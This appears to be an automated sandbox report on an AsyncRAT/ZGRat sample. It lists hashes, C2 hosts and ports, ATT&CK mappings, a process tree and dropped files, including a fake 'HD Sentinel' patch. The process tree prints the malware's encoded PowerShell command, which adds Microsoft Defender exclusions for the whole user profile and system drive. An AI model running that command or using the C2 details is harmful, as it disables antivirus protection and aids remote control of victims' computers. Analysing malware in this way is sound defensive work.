Analysis

  • max time kernel
    141s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-05-2024 11:37

General

  • Target

    369be61aca46750085c842147909f80c8f938555071adeaceac6727bfcf74186.exe

  • Size

    2.3MB

  • MD5

    a717a432c558f56c46709d6d3ec9837f

  • SHA1

    ceda052be2519383085089a41c422ce2b1400a46

  • SHA256

    369be61aca46750085c842147909f80c8f938555071adeaceac6727bfcf74186

  • SHA512

    e859810a198b8b946581ed6197b1154856e736687dd593d383dc952a3afd597ed6b5a631a8e6b2228a425b809b772457e6e10e0ca6f68cd8f0a8cc637a81132c

  • SSDEEP

    49152:T+GJaXbo4IKA2WN4M63n4dHzCJYU6Mm4/4w2RAObR8XlZrzyiko:TboxWN4UHzCJYCmX5w1ZXyik

Malware Config

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

C2

5512.sytes.net:6606

5512.sytes.net:7707

5512.sytes.net:8808

95.211.208.153:6606

95.211.208.153:7707

95.211.208.153:8808

Mutex

Llg9a02PERRO

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Detect ZGRat V1 34 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\369be61aca46750085c842147909f80c8f938555071adeaceac6727bfcf74186.exe
    "C:\Users\Admin\AppData\Local\Temp\369be61aca46750085c842147909f80c8f938555071adeaceac6727bfcf74186.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3872
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZQBkACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAagBkACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHMAawBmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAZwB4ACMAPgA="
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3132
    • C:\Users\Admin\AppData\Local\Dfzxuwcml.exe
      "C:\Users\Admin\AppData\Local\Dfzxuwcml.exe"
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of SetThreadContext
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:5104
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4744
    • C:\Users\Admin\AppData\Local\Temp\hd.sentinel.pro.4.x-5.x-patch.exe
      "C:\Users\Admin\AppData\Local\Temp\hd.sentinel.pro.4.x-5.x-patch.exe"
      2⤵
      • Executes dropped EXE
      PID:4760

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Persistence

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Dfzxuwcml.exe
    Filesize

    2.2MB

    MD5

    577b8f4cd65df6e3cd42d7d37c7917cf

    SHA1

    5033814e5aade04682bf7cb7fca3e32c46c5512a

    SHA256

    d4360ef0464f7620fe0e3d5185adcdc0781aacfe23510d2c6c2e85c1095c8948

    SHA512

    a42dab76abe41e53d7eee1ff3cec3092b26e1a05bdd6c91e8f12e35f6f14fc36df5ef918d0a2818d9f549db1e8ace169ff8ed3f441253a9a27b89c1ec816ff9d

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mcdwnzfy.3ed.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\hd.sentinel.pro.4.x-5.x-patch.exe
    Filesize

    85KB

    MD5

    57824abbb9afe394c8a17a410e60c6fd

    SHA1

    cdb3fe63c22e7d93d4a47bdb966b09f1b478f19f

    SHA256

    becb4e1eaa4fbd915241f1138e2ed7b9833dc1cf66d6da25f9fac1a3e317c3ee

    SHA512

    8b4e82437d6a30e73b65d0abc41b68d8420454622efd43d8d874ecee7a9251f36555d4c35dd13f886250948df1b9606ee61d0bcb2c8abb748b316dadff539c3d

  • memory/3132-4955-0x0000000007EF0000-0x0000000007F0A000-memory.dmp
    Filesize

    104KB

  • memory/3132-4948-0x0000000007E00000-0x0000000007E0E000-memory.dmp
    Filesize

    56KB

  • memory/3132-26-0x00000000052B0000-0x00000000052E6000-memory.dmp
    Filesize

    216KB

  • memory/3132-30-0x0000000073AE0000-0x0000000074290000-memory.dmp
    Filesize

    7.7MB

  • memory/3132-29-0x00000000059A0000-0x0000000005FC8000-memory.dmp
    Filesize

    6.2MB

  • memory/3132-32-0x0000000073AE0000-0x0000000074290000-memory.dmp
    Filesize

    7.7MB

  • memory/3132-4961-0x0000000073AE0000-0x0000000074290000-memory.dmp
    Filesize

    7.7MB

  • memory/3132-4956-0x0000000007E40000-0x0000000007E48000-memory.dmp
    Filesize

    32KB

  • memory/3132-34-0x00000000058C0000-0x00000000058E2000-memory.dmp
    Filesize

    136KB

  • memory/3132-36-0x0000000006140000-0x00000000061A6000-memory.dmp
    Filesize

    408KB

  • memory/3132-35-0x0000000005FD0000-0x0000000006036000-memory.dmp
    Filesize

    408KB

  • memory/3132-51-0x0000000006230000-0x0000000006584000-memory.dmp
    Filesize

    3.3MB

  • memory/3132-4952-0x0000000007E10000-0x0000000007E24000-memory.dmp
    Filesize

    80KB

  • memory/3132-28-0x0000000073AE0000-0x0000000074290000-memory.dmp
    Filesize

    7.7MB

  • memory/3132-3129-0x0000000007DC0000-0x0000000007DD1000-memory.dmp
    Filesize

    68KB

  • memory/3132-219-0x0000000006880000-0x000000000689E000-memory.dmp
    Filesize

    120KB

  • memory/3132-2772-0x0000000007E50000-0x0000000007EE6000-memory.dmp
    Filesize

    600KB

  • memory/3132-2372-0x00000000055D0000-0x00000000055DA000-memory.dmp
    Filesize

    40KB

  • memory/3132-1737-0x0000000008210000-0x000000000888A000-memory.dmp
    Filesize

    6.5MB

  • memory/3132-1748-0x0000000007BC0000-0x0000000007BDA000-memory.dmp
    Filesize

    104KB

  • memory/3132-1112-0x0000000006E50000-0x0000000006E82000-memory.dmp
    Filesize

    200KB

  • memory/3132-1245-0x0000000006E30000-0x0000000006E4E000-memory.dmp
    Filesize

    120KB

  • memory/3132-1246-0x0000000007A70000-0x0000000007B13000-memory.dmp
    Filesize

    652KB

  • memory/3132-1113-0x0000000070230000-0x000000007027C000-memory.dmp
    Filesize

    304KB

  • memory/3132-220-0x00000000068B0000-0x00000000068FC000-memory.dmp
    Filesize

    304KB

  • memory/4744-4964-0x0000000000400000-0x0000000000412000-memory.dmp
    Filesize

    72KB

  • memory/4744-4970-0x00000000056B0000-0x000000000574C000-memory.dmp
    Filesize

    624KB

  • memory/5104-92-0x0000000005650000-0x000000000586A000-memory.dmp
    Filesize

    2.1MB

  • memory/5104-95-0x0000000005650000-0x000000000586A000-memory.dmp
    Filesize

    2.1MB

  • memory/5104-83-0x0000000005650000-0x000000000586A000-memory.dmp
    Filesize

    2.1MB

  • memory/5104-77-0x0000000005650000-0x000000000586A000-memory.dmp
    Filesize

    2.1MB

  • memory/5104-75-0x0000000005650000-0x000000000586A000-memory.dmp
    Filesize

    2.1MB

  • memory/5104-71-0x0000000005650000-0x000000000586A000-memory.dmp
    Filesize

    2.1MB

  • memory/5104-69-0x0000000005650000-0x000000000586A000-memory.dmp
    Filesize

    2.1MB

  • memory/5104-67-0x0000000005650000-0x000000000586A000-memory.dmp
    Filesize

    2.1MB

  • memory/5104-65-0x0000000005650000-0x000000000586A000-memory.dmp
    Filesize

    2.1MB

  • memory/5104-63-0x0000000005650000-0x000000000586A000-memory.dmp
    Filesize

    2.1MB

  • memory/5104-61-0x0000000005650000-0x000000000586A000-memory.dmp
    Filesize

    2.1MB

  • memory/5104-58-0x0000000005650000-0x000000000586A000-memory.dmp
    Filesize

    2.1MB

  • memory/5104-59-0x0000000005650000-0x000000000586A000-memory.dmp
    Filesize

    2.1MB

  • memory/5104-50-0x0000000005650000-0x000000000586A000-memory.dmp
    Filesize

    2.1MB

  • memory/5104-87-0x0000000005650000-0x000000000586A000-memory.dmp
    Filesize

    2.1MB

  • memory/5104-55-0x0000000005650000-0x000000000586A000-memory.dmp
    Filesize

    2.1MB

  • memory/5104-43-0x0000000005650000-0x000000000586A000-memory.dmp
    Filesize

    2.1MB

  • memory/5104-53-0x0000000005650000-0x000000000586A000-memory.dmp
    Filesize

    2.1MB

  • memory/5104-48-0x0000000005650000-0x000000000586A000-memory.dmp
    Filesize

    2.1MB

  • memory/5104-89-0x0000000005650000-0x000000000586A000-memory.dmp
    Filesize

    2.1MB

  • memory/5104-93-0x0000000005650000-0x000000000586A000-memory.dmp
    Filesize

    2.1MB

  • memory/5104-85-0x0000000005650000-0x000000000586A000-memory.dmp
    Filesize

    2.1MB

  • memory/5104-97-0x0000000005650000-0x000000000586A000-memory.dmp
    Filesize

    2.1MB

  • memory/5104-99-0x0000000005650000-0x000000000586A000-memory.dmp
    Filesize

    2.1MB

  • memory/5104-101-0x0000000005650000-0x000000000586A000-memory.dmp
    Filesize

    2.1MB

  • memory/5104-105-0x0000000005650000-0x000000000586A000-memory.dmp
    Filesize

    2.1MB

  • memory/5104-107-0x0000000005650000-0x000000000586A000-memory.dmp
    Filesize

    2.1MB

  • memory/5104-109-0x0000000005650000-0x000000000586A000-memory.dmp
    Filesize

    2.1MB

  • memory/5104-111-0x0000000005650000-0x000000000586A000-memory.dmp
    Filesize

    2.1MB

  • memory/5104-103-0x0000000005650000-0x000000000586A000-memory.dmp
    Filesize

    2.1MB

  • memory/5104-73-0x0000000005650000-0x000000000586A000-memory.dmp
    Filesize

    2.1MB

  • memory/5104-46-0x0000000005650000-0x000000000586A000-memory.dmp
    Filesize

    2.1MB

  • memory/5104-4951-0x0000000073AE0000-0x0000000074290000-memory.dmp
    Filesize

    7.7MB

  • memory/5104-44-0x0000000005650000-0x000000000586A000-memory.dmp
    Filesize

    2.1MB

  • memory/5104-4953-0x0000000005AC0000-0x0000000005B1C000-memory.dmp
    Filesize

    368KB

  • memory/5104-4954-0x0000000005B60000-0x0000000005BAC000-memory.dmp
    Filesize

    304KB

  • memory/5104-37-0x0000000005950000-0x00000000059E2000-memory.dmp
    Filesize

    584KB

  • memory/5104-33-0x0000000005E20000-0x00000000063C4000-memory.dmp
    Filesize

    5.6MB

  • memory/5104-4957-0x0000000006860000-0x00000000068B4000-memory.dmp
    Filesize

    336KB

  • memory/5104-31-0x0000000005650000-0x0000000005870000-memory.dmp
    Filesize

    2.1MB

  • memory/5104-27-0x0000000000B80000-0x0000000000DB2000-memory.dmp
    Filesize

    2.2MB

  • memory/5104-4965-0x0000000073AE0000-0x0000000074290000-memory.dmp
    Filesize

    7.7MB

  • memory/5104-25-0x0000000073AEE000-0x0000000073AEF000-memory.dmp
    Filesize

    4KB